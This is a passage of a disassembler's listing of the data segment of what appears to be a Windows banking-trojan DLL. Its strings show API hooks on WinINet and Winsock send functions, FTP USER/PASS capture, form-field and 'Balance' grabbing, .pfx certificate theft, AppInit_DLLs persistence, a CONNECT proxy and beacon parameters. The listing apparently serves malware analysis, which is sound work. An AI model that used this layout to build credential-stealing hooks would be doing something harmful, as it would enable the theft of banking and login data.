aTimesNewRoman db 'Times New Roman',0 ; DATA XREF: sub_1000C9DC+64�o
; char aTimesNewRoma_0[]
aTimesNewRoma_0 db 'Times New Roman',0 ; DATA XREF: sub_1000C9DC+B4�o
; char aKernel32_dll[]
aKernel32_dll db '\kernel32.dll',0 ; DATA XREF: sub_1000C9DC+F9�o
align 4
; char aKpmm[]
aKpmm db 'KPMM',0 ; DATA XREF: sub_1000C9DC+149�o
align 10h
; char aMs32clod_8[]
aMs32clod_8 db 'ms32clod',0 ; DATA XREF: sub_1000C9DC+15B�o
align 4
aSD_0 db '%s %d',0 ; DATA XREF: .text:1000CBFF�o
align 4
aSD_1 db '%s %d',0 ; DATA XREF: .text:1000CC76�o
align 4
aL00834_dat_0 db '\l00834.dat',0 ; DATA XREF: .text:1000CCA4�o
dword_10023358 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_1000CFE0+2E�o ...
dword_10023368 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_10023378 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_1000DC80+29�o ...
dword_10023388 dd 3050F4A3h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_1000DD20+22�o ...
dword_10023398 dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_100233A8 dd 3050F434h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_1000E380+7�o
dword_100233B8 dd 3050F5D2h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_1000DF70+29�o ...
dd offset aProxy ; "proxy"
dd 50h, 1BBh
aProxy db 'proxy',0 ; DATA XREF: .data:100233C8�o
align 4
a1_3: ; DATA XREF: sub_1000E66B+72�o
unicode 0, <1>,0
; char a_pfx_1[]
a_pfx_1 db '.pfx',0 ; DATA XREF: sub_1000E66B+1C8�o
align 4
aMy_1: ; DATA XREF: sub_1000E866+1D�o
unicode 0, <MY>,0
align 10h
aSecur32_dll db 'Secur32.dll',0 ; DATA XREF: .text:1000E961�o
aInitsecurityin db 'InitSecurityInterfaceA',0 ; DATA XREF: .text:loc_1000E994�o
align 4
off_10023414 dd offset EncryptMessage ; DATA XREF: .text:10010517�r
off_10023418 dd offset DecryptMessage ; DATA XREF: .text:10010586�r
; DWORD dwTlsIndex
dwTlsIndex dd 0FFFFFFFFh ; DATA XREF: sub_1001361F+4�r
; sub_1001361F+F�r ...
; DWORD dword_10023420
dword_10023420 dd 0FFFFFFFFh ; sub_1001361F+36�r ...
; char aUserLocaleSSys[]
aUserLocaleSSys db 'User Locale: %s',0Dh,0Ah ; DATA XREF: sub_1000EB30+47�o
db ' System: ',0
align 10h
; char aMicrosoftWindo[]
aMicrosoftWindo db 'Microsoft Windows Server 2003, ',0 ; DATA XREF: sub_1000EB30+E3�o
; char aMicrosoftWin_0[]
aMicrosoftWin_0 db 'Microsoft Windows XP ',0 ; DATA XREF: sub_1000EB30+104�o
align 4
; char aMicrosoftWin_1[]
aMicrosoftWin_1 db 'Microsoft Windows 2000 ',0 ; DATA XREF: sub_1000EB30+125�o
; char aMicrosoftWin_2[]
aMicrosoftWin_2 db 'Microsoft Windows NT ',0 ; DATA XREF: sub_1000EB30+13D�o
align 4
; char aWorkstation4_0[]
aWorkstation4_0 db 'Workstation 4.0 ',0 ; DATA XREF: sub_1000EB30+173�o
align 4
; char aHomeEdition[]
aHomeEdition db 'Home Edition ',0 ; DATA XREF: sub_1000EB30+19A�o
align 4
; char aProfessional[]
aProfessional db 'Professional ',0 ; DATA XREF: sub_1000EB30:loc_1000ECDB�o
align 4
; char aDatacenterEdit[]
aDatacenterEdit db 'Datacenter Edition ',0 ; DATA XREF: sub_1000EB30+213�o
; char aEnterpriseEdit[]
aEnterpriseEdit db 'Enterprise Edition ',0 ; DATA XREF: sub_1000EB30+237�o
; char aWebEdition[]
aWebEdition db 'Web Edition ',0 ; DATA XREF: sub_1000EB30+25C�o
align 4
; char aStandardEditio[]
aStandardEditio db 'Standard Edition ',0 ; DATA XREF: sub_1000EB30:loc_1000ED9D�o
align 4
; char aDatacenterServ[]
aDatacenterServ db 'Datacenter Server ',0 ; DATA XREF: sub_1000EB30+2A9�o
align 4
; char aAdvancedServer[]
aAdvancedServer db 'Advanced Server ',0 ; DATA XREF: sub_1000EB30+2CC�o
align 10h
; char aServer_0[]
aServer_0 db 'Server ',0 ; DATA XREF: sub_1000EB30:loc_1000EE0D�o
; char aServer4_0Enter[]
aServer4_0Enter db 'Server 4.0, Enterprise Edition ',0 ; DATA XREF: sub_1000EB30+300�o
; char aServer4_0[]
aServer4_0 db 'Server 4.0 ',0 ; DATA XREF: sub_1000EB30:loc_1000EE41�o
; char aSystemCurrentc[]
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\ProductOptions',0
; DATA XREF: sub_1000EB30+330�o
; char aProducttype[]
aProducttype db 'ProductType',0 ; DATA XREF: sub_1000EB30+362�o
; char aWinnt[]
aWinnt db 'WINNT',0 ; DATA XREF: sub_1000EB30+3A1�o
align 4
; char aWorkstation[]
aWorkstation db 'Workstation ',0 ; DATA XREF: sub_1000EB30+3B0�o
align 4
; char aLanmannt[]
aLanmannt db 'LANMANNT',0 ; DATA XREF: sub_1000EB30+3C6�o
align 4
; char aServer_1[]
aServer_1 db 'Server ',0 ; DATA XREF: sub_1000EB30+3D5�o
; char aServernt[]
aServernt db 'SERVERNT',0 ; DATA XREF: sub_1000EB30+3EB�o
align 4
; char aAdvancedServ_0[]
aAdvancedServ_0 db 'Advanced Server ',0 ; DATA XREF: sub_1000EB30+3FA�o
align 4
; char aD_D[]
aD_D db '%d.%d ',0 ; DATA XREF: sub_1000EB30+417�o
align 4
; char aServicePack6[]
aServicePack6 db 'Service Pack 6',0 ; DATA XREF: sub_1000EB30+44A�o
align 4
; char aSoftwareMicr_0[]
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009',0
; DATA XREF: sub_1000EB30+46F�o
; char aServicePack6aB[]
aServicePack6aB db 'Service Pack 6a (Build %d)',0Ah,0 ; DATA XREF: sub_1000EB30+49A�o
; char aSBuildD[]
aSBuildD db '%s (Build %d)',0Ah,0 ; DATA XREF: sub_1000EB30+4C5�o
align 4
; char aSBuildD_0[]
aSBuildD_0 db '%s (Build %d)',0Ah,0 ; DATA XREF: sub_1000EB30+50E�o
align 4
; char aResDxD[]
aResDxD db 0Ah ; DATA XREF: sub_1000EB30+546�o
db 'Res: %dx%d',0
; char aUserAgent[]
aUserAgent db 'User Agent',0 ; DATA XREF: sub_1000EB30+5B8�o
align 4
; char aUserAgent_0[]
aUserAgent_0 db 0Dh,0Ah ; DATA XREF: sub_1000EB30+5D3�o
db 'User agent:',0
align 4
aClose_1 db 'close',0 ; DATA XREF: .text:1000F162�o
align 4
asc_100236CC: ; DATA XREF: .text:1000F199�o
unicode 0, < >,0
; char asc_100236D0[]
asc_100236D0: ; DATA XREF: sub_1000F2AB:loc_1000F2E1�o
unicode 0, <*>,0
; char aAppinit_dlls[]
aAppinit_dlls db 'AppInit_DLLs',0 ; DATA XREF: sub_1000FCEB+9C�o
align 4
; char asc_100236E4[]
asc_100236E4 db '======',0 ; DATA XREF: sub_1000FFF9+73�o
align 4
; char asc_100236EC[]
asc_100236EC db '======',0Dh,0Ah,0 ; DATA XREF: sub_1000FFF9+AB�o
align 4
; char aEnd[]
aEnd db '=====End=====',0Dh,0Ah,0 ; DATA XREF: sub_1000FFF9+CF�o
; char Caption[]
Caption db 'LoadLibrary',0 ; DATA XREF: sub_100105F9+2�o
; char aD_D_DDD[]
aD_D_DDD db '%d.%d.%d %d:%d',0 ; DATA XREF: sub_10010623+78�o
align 4
; char aSS_20[]
aSS_20 db '%s%s',0 ; DATA XREF: sub_10010623+BB�o
align 4
; char aDSSSSS[]
aDSSSSS db '%d|%s|%s|%s|%s|%s',0 ; DATA XREF: sub_10010623+160�o
align 10h
; char a1_0[]
a1_0: ; DATA XREF: sub_100108A3:loc_10010C43�o
unicode 0, <1>,0
; char asc_10023744[]
asc_10023744 db '---------------',0 ; DATA XREF: sub_100108A3+543�o
; char aBalance[]
aBalance db '--------------',0Dh,0Ah ; DATA XREF: sub_100108A3+56E�o
db 'Balance :',0Dh,0Ah,0
; char asc_10023770[]
asc_10023770 db 0Dh,0Ah ; DATA XREF: sub_100108A3+58F�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char a1_1[]
a1_1: ; DATA XREF: sub_10011167:loc_10011539�o
unicode 0, <1>,0
; char asc_1002377C[]
asc_1002377C db '---------------',0 ; DATA XREF: sub_10011167+576�o
; char aBalance_0[]
aBalance_0 db '--------------',0Dh,0Ah ; DATA XREF: sub_10011167+5A1�o
db 'Balance :',0Dh,0Ah,0
; char asc_100237A8[]
asc_100237A8 db 0Dh,0Ah ; DATA XREF: sub_10011167+5C2�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char aUser[]
aUser db 'USER',0 ; DATA XREF: sub_10011AA3+A9�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_10011AA3+BF�o
align 10h
; char aHftpUrlSS[]
aHftpUrlSS db '---------------hFTP--------------',0Dh,0Ah
; DATA XREF: sub_10011AA3+14A�o
db 'URL %s',0Dh,0Ah
db '%s',0Dh,0Ah,0
; char asc_100237F0[]
asc_100237F0 db 0Dh,0Ah ; DATA XREF: sub_10011AA3+186�o
db 0Dh,0Ah,0
align 4
; char aPassError[]
aPassError db 0Dh,0Ah ; DATA XREF: sub_10011AA3:loc_10011C3B�o
db ' - PASS error',0
; char aUser_0[]
aUser_0 db 'USER',0 ; DATA XREF: sub_10011CA2+57�o
align 10h
; char aPass_0[]
aPass_0 db 'PASS',0 ; DATA XREF: sub_10011CA2+6D�o
align 4
; char aHftpUrlSS_0[]
aHftpUrlSS_0 db '---------------hFTP--------------',0Dh,0Ah ; DATA XREF: sub_10011CA2+F8�o
db 'URL %s',0Dh,0Ah
db '%s',0Dh,0Ah,0
; char asc_10023848[]
asc_10023848 db 0Dh,0Ah ; DATA XREF: sub_10011CA2+13B�o
db 0Dh,0Ah,0
align 10h
; char aPassError_0[]
aPassError_0 db 0Dh,0Ah ; DATA XREF: sub_10011CA2:loc_10011DEF�o
db ' - PASS error',0
; char a_htm_php_do_as[]
a_htm_php_do_as db '.htm*.php*.do*.asp*.jsp*?',0 ; DATA XREF: sub_10011E49+106�o
align 4
; char asc_1002387C[]
asc_1002387C db '//',0 ; DATA XREF: sub_10011E49+1B9�o
align 10h
; char asc_10023880[]
asc_10023880 db '//',0 ; DATA XREF: sub_10011E49+1D8�o
align 4
; char asc_10023884[]
asc_10023884: ; DATA XREF: sub_10011E49+27C�o
unicode 0, </>,0
; char asc_10023888[]
asc_10023888: ; DATA XREF: sub_10011E49:loc_10012266�o
unicode 0, </>,0
; char asc_1002388C[]
asc_1002388C db '//',0 ; DATA XREF: sub_10011E49+4C1�o
align 10h
; char asc_10023890[]
asc_10023890 db '//',0 ; DATA XREF: sub_10011E49+4E0�o
align 4
; char asc_10023894[]
asc_10023894: ; DATA XREF: sub_10011E49:loc_100123BE�o
unicode 0, </>,0
; char asc_10023898[]
asc_10023898 db '//',0 ; DATA XREF: sub_10011E49+702�o
align 4
; char asc_1002389C[]
asc_1002389C db '//',0 ; DATA XREF: sub_10011E49+71F�o
align 10h
; char asc_100238A0[]
asc_100238A0: ; DATA XREF: sub_10011E49:loc_100125F9�o
unicode 0, </>,0
; char aPost[]
aPost db 'POST',0 ; DATA XREF: sub_10011E49:loc_10012779�o
align 4
; char aAcceptEncoding[]
aAcceptEncoding db 0Dh,0Ah ; DATA XREF: sub_10012894+16D�o
db 'Accept-Encoding: gzip, deflate',0
align 10h
; char aReferer[]
aReferer db 'Referer',0 ; DATA XREF: sub_10012894+1BC�o
; char aReferer_0[]
aReferer_0 db 'Referer',0 ; DATA XREF: sub_10012894+1D5�o
; char asc_100238E0[]
asc_100238E0 db 0Dh,0Ah,0 ; DATA XREF: sub_10012894+209�o
align 4
; char asc_100238E4[]
asc_100238E4 db 0Dh,0Ah,0 ; DATA XREF: sub_10012894+222�o
align 4
; char asc_100238E8[]
asc_100238E8 db '---------------',0 ; DATA XREF: sub_10012894+269�o
; char asc_100238F8[]
asc_100238F8 db '--------------',0Dh,0Ah,0 ; DATA XREF: sub_10012894+297�o
align 4
; char aField[]
aField db 'Field :',0Dh,0Ah,0 ; DATA XREF: sub_10012894+2E5�o
align 4
; char aThread[]
aThread db 0Dh,0Ah ; DATA XREF: sub_10012894+31B�o
db 0Dh,0Ah
db 'Thread: ',0
align 4
; char asc_10023928[]
asc_10023928 db 0Dh,0Ah ; DATA XREF: sub_10012894+33E�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char aAcceptEncodi_0[]
aAcceptEncodi_0 db 0Dh,0Ah ; DATA XREF: sub_10012DD0+131�o
db 'Accept-Encoding: gzip, deflate',0
align 4
; char aReferer_1[]
aReferer_1 db 'Referer',0 ; DATA XREF: sub_10012DD0+169�o
; char aReferer_2[]
aReferer_2 db 'Referer',0 ; DATA XREF: sub_10012DD0+182�o
; char asc_10023964[]
asc_10023964 db 0Dh,0Ah,0 ; DATA XREF: sub_10012DD0+1B6�o
align 4
; char asc_10023968[]
asc_10023968 db 0Dh,0Ah,0 ; DATA XREF: sub_10012DD0+1CF�o
align 4
; char asc_1002396C[]
asc_1002396C db '---------------',0 ; DATA XREF: sub_10012DD0+206�o
; char asc_1002397C[]
asc_1002397C db '--------------',0Dh,0Ah,0 ; DATA XREF: sub_10012DD0+234�o
align 10h
; char aField_0[]
aField_0 db 'Field :',0Dh,0Ah,0 ; DATA XREF: sub_10012DD0+282�o
align 4
; char aThread_0[]
aThread_0 db 0Dh,0Ah ; DATA XREF: sub_10012DD0+2B8�o
db 0Dh,0Ah
db 'Thread: ',0
align 4
; char asc_100239AC[]
asc_100239AC db 0Dh,0Ah ; DATA XREF: sub_10012DD0+2DB�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aPvoidReal_crea db '&(PVOID&)Real_CreateFileW',0 ; DATA XREF: sub_1001338E+14�o
align 10h
aPvoidReal_pfxi db '&(PVOID&)Real_PFXImportCertStore',0 ; DATA XREF: sub_1001338E+2B�o
align 4
aPvoidReal_inte db '&(PVOID&)Real_InternetConnect',0 ; DATA XREF: sub_1001338E+42�o
align 4
aPvoidReal_http db '&(PVOID&)Real_HttpOpenRequest',0 ; DATA XREF: sub_1001338E+59�o
align 4
aPvoidReal_ht_0 db '&(PVOID&)Real_HttpSendRequestW',0 ; DATA XREF: sub_1001338E+70�o
align 4
aPvoidReal_ht_1 db '&(PVOID&)Real_HttpSendRequestA',0 ; DATA XREF: sub_1001338E+87�o
align 4
aPvoidReal_in_0 db '&(PVOID&)Real_InternetQueryDataAvailable',0
; DATA XREF: sub_1001338E+9E�o
align 10h
aPvoidReal_in_1 db '&(PVOID&)Real_InternetReadFile',0 ; DATA XREF: sub_1001338E+B5�o
align 10h
aPvoidReal_in_2 db '&(PVOID&)Real_InternetReadFileEx',0 ; DATA XREF: sub_1001338E+CC�o
align 4
aPvoidReal_in_3 db '&(PVOID&)Real_InternetSetStatusCallback',0 ; DATA XREF: sub_1001338E+E3�o
aPvoidReal_rege db '&(PVOID&)Real_RegEnumValueW',0 ; DATA XREF: sub_1001338E+FA�o
aPvoidReal_send db '&(PVOID&)Real_send',0 ; DATA XREF: sub_1001338E+111�o
align 4
aPvoidReal_wsas db '&(PVOID&)Real_WSASend',0 ; DATA XREF: sub_1001338E+128�o
align 4
aPvoidReal_cr_0 db '&(PVOID&)Real_CreateFileW',0 ; DATA XREF: sub_100134D4+14�o
align 10h
aPvoidReal_pf_0 db '&(PVOID&)Real_PFXImportCertStore',0 ; DATA XREF: sub_100134D4+2B�o
align 4
aPvoidReal_in_4 db '&(PVOID&)Real_InternetConnect',0 ; DATA XREF: sub_100134D4+42�o
align 4
aPvoidReal_ht_2 db '&(PVOID&)Real_HttpOpenRequest',0 ; DATA XREF: sub_100134D4+59�o
align 4
aPvoidReal_ht_3 db '&(PVOID&)Real_HttpSendRequestW',0 ; DATA XREF: sub_100134D4+70�o
align 4
aPvoidReal_ht_4 db '&(PVOID&)Real_HttpSendRequestA',0 ; DATA XREF: sub_100134D4+87�o
align 4
aPvoidReal_in_5 db '&(PVOID&)Real_InternetQueryDataAvailable',0
; DATA XREF: sub_100134D4+9E�o
align 10h
aPvoidReal_in_6 db '&(PVOID&)Real_InternetReadFile',0 ; DATA XREF: sub_100134D4+B5�o
align 10h
aPvoidReal_in_7 db '&(PVOID&)Real_InternetReadFileEx',0 ; DATA XREF: sub_100134D4+CC�o
align 4
aPvoidReal_in_8 db '&(PVOID&)Real_InternetSetStatusCallback',0 ; DATA XREF: sub_100134D4+E3�o
aPvoidReal_re_0 db '&(PVOID&)Real_RegEnumValueW',0 ; DATA XREF: sub_100134D4+FA�o
aPvoidReal_se_0 db '&(PVOID&)Real_send',0 ; DATA XREF: sub_100134D4+111�o
align 4
aPvoidReal_ws_0 db '&(PVOID&)Real_WSASend',0 ; DATA XREF: sub_100134D4+128�o
align 4
; char aSystem32[]
aSystem32 db 'system32',0 ; DATA XREF: DllMain(x,x,x)+1D�o
align 10h
; char aSvchost_exe[]
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: DllMain(x,x,x)+40�o
; char aRegedt32[]
aRegedt32 db 'regedt32',0 ; DATA XREF: DllMain(x,x,x)+63�o
align 4
; char aVisualStudio[]
aVisualStudio db 'visual studio',0 ; DATA XREF: DllMain(x,x,x):loc_100137EA�o
align 4
; char aQip[]
aQip db 'qip',0 ; DATA XREF: DllMain(x,x,x)+B1�o
; char aUsergate[]
aUsergate db 'usergate',0 ; DATA XREF: DllMain(x,x,x)+D8�o
align 4
; char aNotepad[]
aNotepad db 'notepad',0 ; DATA XREF: DllMain(x,x,x)+FB�o
; char aPsi_exe[]
aPsi_exe db 'psi.exe',0 ; DATA XREF: DllMain(x,x,x)+11E�o
; char aFc_exe[]
aFc_exe db 'fc.exe',0 ; DATA XREF: DllMain(x,x,x)+141�o
align 10h
; char aExplorer_exe[]
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: DllMain(x,x,x):loc_100138EE�o
align 10h
; char aSvchost_exe_0[]
aSvchost_exe_0 db 'svchost.exe',0 ; DATA XREF: DllMain(x,x,x)+1B1�o
; char aSSS[]
aSSS db '%s%s%s',0 ; DATA XREF: sub_10013A20+69�o
align 4
; char aConnect[]
aConnect db 'CONNECT',0 ; DATA XREF: sub_10013A20+7B�o
; char asc_10023D7C[]
asc_10023D7C: ; DATA XREF: sub_10013A20+9E�o
unicode 0, <:>,0
; char aHttp_0[]
aHttp_0 db 'http://',0 ; DATA XREF: sub_10013A20+F0�o
; char aHttp_1[]
aHttp_1 db 'http://',0 ; DATA XREF: sub_10013A20+112�o
; char asc_10023D90[]
asc_10023D90: ; DATA XREF: sub_10013A20+177�o
unicode 0, <:>,0
; char asc_10023D94[]
asc_10023D94: ; DATA XREF: sub_10013A20+1C0�o
unicode 0, <:>,0
; char aHttp_2[]
aHttp_2 db 'http://',0 ; DATA XREF: sub_10013A20+30F�o
; char aProxyConnectio[]
aProxyConnectio db 'Proxy-Connection: Keep-Alive',0Dh,0Ah,0 ; DATA XREF: sub_10013A20+357�o
align 10h
aHttp1_1 db 'HTTP/1.1',0 ; DATA XREF: sub_10013A20+39A�o
align 4
; char aHttp1_0[]
aHttp1_0 db 'HTTP/1.0',0 ; DATA XREF: sub_10013A20+39F�o
align 4
; char aErrorRecv[]
aErrorRecv db 0Ah ; DATA XREF: sub_10013E02+198�o
db 'Error Recv',0
; char aClientCloseCon[]
aClientCloseCon db 'Client Close connection',0Ah,0 ; DATA XREF: sub_10013E02+1CF�o
align 10h
; char buf[]
buf db 'HTTP/1.1 200 Connection established',0Dh,0Ah
; DATA XREF: sub_10013E02+2B2�o
db 0Dh,0Ah,0
; char aConnect_0[]
aConnect_0 db 'CONNECT',0 ; DATA XREF: sub_10013E02+2DE�o
aLocalhost db 'localhost',0 ; DATA XREF: sub_100142FF+32�o
align 4
; char aClientCannotRe[]
aClientCannotRe db 'Client: Cannot resolve address [%s]: Error %d',0Ah,0
; DATA XREF: sub_100142FF+B5�o
align 4
; char aWs2_32[]
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_10016C4C+8E�o
align 4
; char aAccept[]
aAccept db 'accept',0 ; DATA XREF: sub_10016C4C+9F�o
align 4
; char aBind[]
aBind db 'bind',0 ; DATA XREF: sub_10016C4C+B6�o
align 4
; char asc_10023E84[]
asc_10023E84 db '--',0 ; DATA XREF: sub_10016C4C+FA�o
align 4
; char a10_[]
a10_ db '10.',0 ; DATA XREF: sub_10016C4C+333�o
; char a192_168_[]
a192_168_ db '192.168.',0 ; DATA XREF: sub_10016C4C+34E�o
align 4
; char a172_16_[]
a172_16_ db '172.16.',0 ; DATA XREF: sub_10016C4C+369�o
; char aTcp[]
aTcp db ':TCP',0 ; DATA XREF: sub_10016C4C+50A�o
align 4
; char aTcp_0[]
aTcp_0 db ':TCP',0 ; DATA XREF: sub_10016C4C+5CA�o
align 10h
; char aSSSCntSHpDSpD[]
aSSSCntSHpDSpD db '%s%s%s&cnt=%s&hp=%d&sp=%d',0 ; DATA XREF: sub_10016C4C+6B5�o
align 4
aCb db 'CB',0 ; DATA XREF: sub_10016C4C:loc_10017346�o
align 10h
; char aSSSCntS[]
aSSSCntS db '%s%s%s&cnt=%s',0 ; DATA XREF: sub_10016C4C+724�o
align 10h
; char a_detour[]
a_detour db '.detour',0 ; DATA XREF: sub_10018210+A9�o
; size_t Count
Count dd 1 ; DATA XREF: sub_10018954+8�r
; sub_10018AC6:loc_10018B69�r ...
byte_10023EEC db 1 ; DATA XREF: sub_100189B8+A1�r
; sub_1001A057+F7�r ...
byte_10023EED db 1 ; DATA XREF: sub_100189B8+9B�r
; sub_1001967C+12�r ...
align 10h
off_10023EF0 dd offset aCdata ; DATA XREF: sub_100194D2+57�r
; sub_10019BC6+45�o ...
; "<![CDATA["
dword_10023EF4 dd 9 off_10023EF8 dd offset asc_10024040 ; DATA XREF: sub_100194D2+64�r
; "]]>"
off_10023EFC dd offset aDoctype ; DATA XREF: sub_1001954D+14�r
; "<!DOCTYPE"
dd 9
dd offset asc_10024030 ; ">"
dd offset aPre ; "<PRE>"
dd 5
dd offset aPre_0 ; "</PRE>"
dd offset aScript ; "<Script>"
dd 8
dd offset aScript_0 ; "</Script>"
dd offset asc_10024000 ; "<!--"
dd 4
dd offset asc_10023FFC ; "-->"
dd 3 dup(0)
off_10023F38 dd offset aAmp ; DATA XREF: sub_10018D54+1B�o
; sub_10018DD2+13�o ...
; "&"
dword_10023F3C dd 5 byte_10023F40 db 26h ; DATA XREF: sub_10018D54:loc_10018D69�r
; sub_10018DD2+D�r
align 4
dd offset aLt ; "<"
dd 4, 3Ch
dd offset aGt ; ">"
dd 4, 3Eh
dd offset aQuot ; """
dd 6, 22h
dd offset aApos ; "'"
dd 6, 27h, 3 dup(0)
off_10023F80 dd offset byte_1001F738 ; DATA XREF: sub_10018D54:loc_10018D92�r
; sub_10018DD2:loc_10018DFF�r ...
off_10023F84 dd offset asc_10023FD0 ; DATA XREF: sub_1001954D:loc_10019591�r
; sub_1001954D+4C�r
; "]>"
dd offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:10023F88�o
align 10h
asc_10023FD0 db ']>',0 ; DATA XREF: .data:off_10023F84�o
align 4
aApos db ''',0 ; DATA XREF: .data:10023F68�o
align 4
aQuot db '"',0 ; DATA XREF: .data:10023F5C�o
align 4
aGt db '>',0 ; DATA XREF: .data:10023F50�o
align 4
aLt db '<',0 ; DATA XREF: .data:10023F44�o
align 4
aAmp db '&',0 ; DATA XREF: .data:off_10023F38�o
align 4
asc_10023FFC db '-->',0 ; DATA XREF: .data:10023F28�o
asc_10024000 db '<!--',0 ; DATA XREF: .data:10023F20�o
align 4
aScript_0 db '</Script>',0 ; DATA XREF: .data:10023F1C�o
align 4
aScript db '<Script>',0 ; DATA XREF: .data:10023F14�o
align 10h
aPre_0 db '</PRE>',0 ; DATA XREF: .data:10023F10�o
align 4
aPre db '<PRE>',0 ; DATA XREF: .data:10023F08�o
align 10h
; char asc_10024030[]
asc_10024030 db '>',0 ; DATA XREF: sub_1001A22D+41F�o
; .data:10023F04�o
align 4
aDoctype db '<!DOCTYPE',0 ; DATA XREF: .data:off_10023EFC�o
align 10h
asc_10024040 db ']]>',0 ; DATA XREF: .data:off_10023EF8�o
aCdata db '<![CDATA[',0 ; DATA XREF: .data:off_10023EF0�o
align 10h
; char Mode[]
Mode db 'rb',0 ; DATA XREF: sub_100189B8+A�o
; sub_1001A057:loc_1001A079�o ...
align 4
; char a?xmlVersion1_0[]
a?xmlVersion1_0 db '<?xml version="1.0" encoding="%s"?>',0Ah,0 ; DATA XREF: sub_10018AC6+F4�o
align 4
aIso88591 db 'ISO-8859-1',0 ; DATA XREF: sub_10018AC6+E8�o
align 4
aShiftJis db 'SHIFT-JIS',0 ; DATA XREF: sub_10018AC6+DA�o
align 4
; char aUtf8[]
aUtf8 db 'utf-8',0 ; DATA XREF: sub_10018AC6+D0�o
; sub_1001AB59+15C�o
align 4
; char aWb[]
aWb db 'wb',0 ; DATA XREF: sub_10018AC6+39�o
; sub_1001AE00+6�o
align 10h
; char asc_100240A0[]
asc_100240A0 db '/>',0Ah,0 ; DATA XREF: sub_1001A22D+46D�o
; char asc_100240A4[]
asc_100240A4 db '/>',0 ; DATA XREF: sub_1001A22D+456�o
align 4
asc_100240A8 db '>',0Ah,0 ; DATA XREF: sub_1001A22D:loc_1001A65C�o
align 4
; char asc_100240AC[]
asc_100240AC db '</',0 ; DATA XREF: sub_1001A22D+3F8�o
align 10h
; char aSjis[]
aSjis db 'sjis',0 ; DATA XREF: sub_1001AB59+19F�o
align 4
; char aShiftJis_0[]
aShiftJis_0 db 'shift-jis',0 ; DATA XREF: sub_1001AB59+18E�o
align 4
; char aShiftjis[]
aShiftjis db 'shiftjis',0 ; DATA XREF: sub_1001AB59+17E�o
align 10h
; char aUtf8_0[]
aUtf8_0 db 'utf8',0 ; DATA XREF: sub_1001AB59+16D�o
align 4
; char aEncoding[]
aEncoding db 'encoding',0 ; DATA XREF: sub_1001AB59+EB�o
align 4
; char aD_D_0[]
aD_D_0 db ' %d.%d%%',0Ah,0 ; DATA XREF: sub_1001AE90+1D5�o
align 10h
word_100240F0 dw 20h ; DATA XREF: sub_1001AE90+178�r
byte_100240F2 db 0 ; DATA XREF: sub_1001AE90+184�r
align 4
dword_100240F4 dd 0 word_100240F8 dw 120h ; DATA XREF: sub_1001AE90+160�r
align 4
dword_100240FC dd 35686C2Dh byte_10024100 db 2Dh ; DATA XREF: sub_1001AE90+95�r
align 4
; char aAddingS[]
aAddingS db 'Adding %s ',0 ; DATA XREF: sub_1001AE90:loc_1001AEF1�o
align 10h
; char aReplacingS[]
aReplacingS db 'Replacing %s ',0 ; DATA XREF: sub_1001AE90+4C�o
align 10h
; char aCanTOpenS[]
aCanTOpenS db 'Can',27h,'t open %s',0Ah,0 ; DATA XREF: sub_1001AE90+2C�o
align 10h
; char aUnableToWrite[]
aUnableToWrite db 'Unable to write',0 ; DATA XREF: sub_1001B450+20�o
; char aOutOfMemory_[]
aOutOfMemory_ db 'Out of memory.',0 ; DATA XREF: sub_1001B770+6C�o
; sub_1001C420+4B�o
align 10h
; char a17[]
a17 db '17',0 ; DATA XREF: sub_1001C6A0+5B�o
align 8
dword_10024158 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_10024168 dd offset off_1001FB68 ; DATA XREF: .rdata:off_1001FB70�o
; .rdata:1001FBAC�o ...
align 10h
a_?av_com_error db '.?AV_com_error@@',0
align 8
off_10024188 dd offset off_1001FB68 ; DATA XREF: .rdata:off_1001FBB8�o
; .rdata:1001FBF4�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
_data ends
;
; Delayed imports from gdiplus.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
extrn GdipGetImageEncodersSize:dword
; DATA XREF: GdipGetImageEncodersSize_thunk+2�o
; j_GdipGetImageEncodersSize_thunk�r ...
extrn GdipGetImageEncoders:dword ; DATA XREF: GdipGetImageEncoders_thunk+2�o
; j_GdipGetImageEncoders_thunk�r
extrn GdipSaveImageToFile:dword ; DATA XREF: GdipSaveImageToFile_thunk+2�o
; j_GdipSaveImageToFile_thunk�r
extrn GdipDisposeImage:dword ; DATA XREF: GdipDisposeImage_thunk+2�o
; j_GdipDisposeImage_thunk�r
extrn GdipFree:dword ; DATA XREF: GdipFree_thunk+2�o
; j_GdipFree_thunk�r
extrn GdipCloneImage:dword ; DATA XREF: GdipCloneImage_thunk+2�o
; j_GdipCloneImage_thunk�r
extrn GdipAlloc:dword ; DATA XREF: GdipAlloc_thunk+2�o
; j_GdipAlloc_thunk�r
extrn GdipCreateBitmapFromHBITMAP:dword
; DATA XREF: GdipCreateBitmapFromHBITMAP_thunk+2�o
; j_GdipCreateBitmapFromHBITMAP_thunk�r
extrn GdipCloneBitmapAreaI:dword ; DATA XREF: GdipCloneBitmapAreaI_thunk+2�o
; j_GdipCloneBitmapAreaI_thunk�r
extrn GdiplusStartup:dword ; DATA XREF: GdiplusStartup_thunk+2�o
; j_GdiplusStartup_thunk�r
